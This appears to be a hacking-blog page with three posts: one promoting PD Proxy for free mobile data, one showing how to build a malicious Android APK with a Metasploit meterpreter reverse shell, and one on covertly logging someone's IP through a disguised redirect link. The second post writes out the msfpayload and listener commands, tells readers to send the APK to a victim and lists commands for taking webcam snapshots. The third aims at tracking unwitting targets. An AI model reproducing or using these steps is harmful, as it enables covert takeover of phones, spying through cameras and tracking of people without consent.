Surf Internet For Free Free Free...

Free Internet - Save money
This post is about how to browse internet for free.
After a Long Time of Research I Got a Huge Way,
To Surf The Internet For Free!!!

This can be done through a software PD PROXY,
which provides free internet.
All you need is mobile or net setter,
and make an account on their website and you can use,
free internet up to 100Mb/day.
i know 100Mb/Day Is Too Less but we should be thankful,
to use internet for free!!!

Let's Start...!!! :)

1.Sign up HERE

2.Now, download the software from the website.
Size of the software is just about 2  Mb.

3.Connect your net setter or phone with the computer via USB Cable.

4.It won’t work with wi-fi connection &,
you can’t make any ad-hoc network through this.

5.The speed of the internet will depend on,
the Net Setter’s speed or operator’s speed.
6.Now, extract zip file and install it in your PC.

7.Launch PD PROXY through launcher.

8.Provide username and password of your account,
which you have created on www.pdproxy.com

9.Now, enjoy surfing internet for free upto 100MB/day.
10.Go on basic setting and select auto connect modem.


This is the best option for the people who just surf internet.
So why spent money when you get it for free through pd proxy.  

Thanx To My Friend Anil For This Great Tutorial,
Any Problem Feel Free To Comment Below...!!!
Read More

Hack Android Phones with Metasploit in Kali Linux!!!

How To Hack Android Phones with Metasploit in Kali Linux



Open Kali Linux Terminal and type
msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk
-p for payloadandroid/meterpreter/reverse_tcp
Lhost (IP address of your local host)192.168.1.6
Lport (Port of your local pc)443
-R formatOutput format
Now we successfully generate the malicious apk File, it will stored on your local computer
/root/Desktop/files.apk
Now open your kli linux terminal and type msfconsole

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.6
set lport 443
exploit
Now send your files.apk files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim Android Phone.
LS
As in Linux, the ‘ls’ command will list the files in the current remote directory.

PS
The ‘ps’ command displays a list of running processes on the target.

Webcam_list
This command provides you a list of all webcams on the target system. Each webcam will have an index number.

Webcam_snap 1
This command take a snapshot for the specified webcam, by default number 1 and will try without argument precision to open the saved snapshot...!!!

We Hope You Loved This Tutorial and Understood it and problem?????
Comment below
\/ \/ \/ \/


Read More

How To Get Somones IP Address Discreetly ( Unique Way Latest Exploit )

How to Get Someone's IP Address Latest Exploit
Hello Readers, I am Back after a long time with a very new and interesting tutorial for you all...

I Recently Found a new Exploit From This Guy Called ' Snorlax ' Well Thanks To Him Lets Proceed With Our Tutorial...!!!

Quick little method to show you how to obtains someones ip without victim suspecting anything.

First open:
http://bit.do/
http://viewmy.pm/google/
https://www.google.com


Type something into google and copy the URL (Obviously don't type what I did as that's not discreet)




Then paste it into bit.do and make a random name for it.


Copy your new link into Google Redirect Exploit and press Submit.



Copy that link and send it to a friend, or your enemy...

Next you need to open traffic stats.



Your victims ip address will be displayed at the bottom of the page upon arrival.

WE HOPE THIS TUTORIAL WENT EASY FOR YOU AS IT IS EASY...
PLEASE SHARE,COMMENT 
IF ANY PROBLEM THEN FOLLOW US ON
Read More